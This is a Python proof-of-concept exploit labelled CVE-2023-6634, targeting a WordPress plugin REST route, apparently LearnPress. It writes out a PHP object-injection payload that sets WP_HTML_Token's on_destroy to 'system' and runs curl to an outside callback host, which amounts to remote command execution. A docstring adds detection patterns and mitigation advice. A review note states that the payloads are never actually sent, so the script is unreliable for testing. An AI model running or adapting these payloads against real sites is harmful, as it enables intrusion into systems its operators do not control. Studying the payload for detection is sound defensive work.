"""Proof-of-concept script labelled CVE-2023-6634 (see the usage string).

The script addresses the WordPress REST route
``/wp-json/lp/v1/load_content_via_ajax/``. The payload strings it builds show
the request shape associated with the issue: a ``callback`` query parameter
carrying a JSON object that names a PHP class and method (``LP_Debug`` /
``var_dump``, ``LP_Helper`` / ``maybe_unserialize``) and an ``args`` parameter
carrying either a marker string or a serialized ``WP_HTML_Token`` object whose
``on_destroy`` field is set to ``system``.

Defender notes:

* Detection: in web-server or WAF logs, look for requests to the route above
  whose query string contains ``callback=`` with a ``"class"``/``"method"``
  pair, or ``args=`` containing a serialized PHP object (``O%3a``).
* Mitigation: update the affected plugin to a fixed release (the ``lp`` route
  and ``LP_*`` class names suggest LearnPress; confirm against the advisory)
  and consider blocking the ``callback`` parameter on this route at the edge.

NOTE(review): as written, nothing from ``payloads`` is attached to the request
that is sent, and the quoted ``command`` is never used. Each loop iteration
issues the same parameterless GET, so this script does not exercise the code
path described above. Its output is therefore not evidence that a site is
patched, nor a valid trigger for testing a detection rule.
"""
import sys
import requests
from urllib.parse import quote


def construct_final_url(interactsh_url, padstr):
    """Return ``interactsh_url`` with ``padstr`` appended.

    Plain string concatenation; no separator is inserted and neither part is
    validated or escaped.
    """
    return f"{interactsh_url}{padstr}"


def exploit(target_url, interactsh_url, command):
    """Build the payload strings, then send one GET per payload entry.

    Args:
        target_url: Base URL of the site, including scheme.
        interactsh_url: Callback URL embedded in the second payload string.
        command: Accepted and URL-quoted, but not used afterwards.

    Each response body, or the error raised while sending, is printed.
    """
    padstr = "random_string"  # fixed marker, not actually randomised
    finalurl = construct_final_url(interactsh_url, padstr)

    # Dead store kept for behavioural parity: the quoted value is never read.
    encoded_command = quote(command)

    # Request-line strings. They are built here but never passed to
    # requests.get() below (see the module docstring).
    payloads = [
        f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Debug","method"%3a"var_dump"}}&args="{padstr}" HTTP/1.1',
        f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Helper","method"%3a"maybe_unserialize"}}&args="O%3a13%3a\u0022WP_HTML_Token\u0022%3a2%3a{{s%3a13%3a\u0022bookmark_name\u0022%3bs%3a64%3a\u0022curl+{finalurl}\u0022%3bs%3a10%3a\u0022on_destroy\u0022%3bs%3a6%3a\u0022system\u0022%3b}}" HTTP/1.1',
    ]

    # Host header is the target with the scheme text stripped; any path or
    # trailing slash in target_url is carried over unchanged.
    host_value = target_url.replace('http://', '').replace('https://', '')
    headers = {
        'Host': host_value,
        'Connection': 'close'
    }

    # The endpoint is the same for every iteration and carries no query string.
    request_url = f"{target_url}/wp-json/lp/v1/load_content_via_ajax/"

    for _unused_payload in payloads:
        try:
            response = requests.get(request_url, headers=headers, timeout=10)
        except Exception as e:
            print(f"Error sending payload: {e}")
        else:
            print(f"Payload sent. Response:\n{response.text}")


if __name__ == "__main__":
    # Exactly three positional arguments are required after the script name.
    if len(sys.argv) != 4:
        print("Usage: python CVE-2023-6634.py ")
        sys.exit(1)

    _, target_url, interactsh_url, command = sys.argv
    exploit(target_url, interactsh_url, command)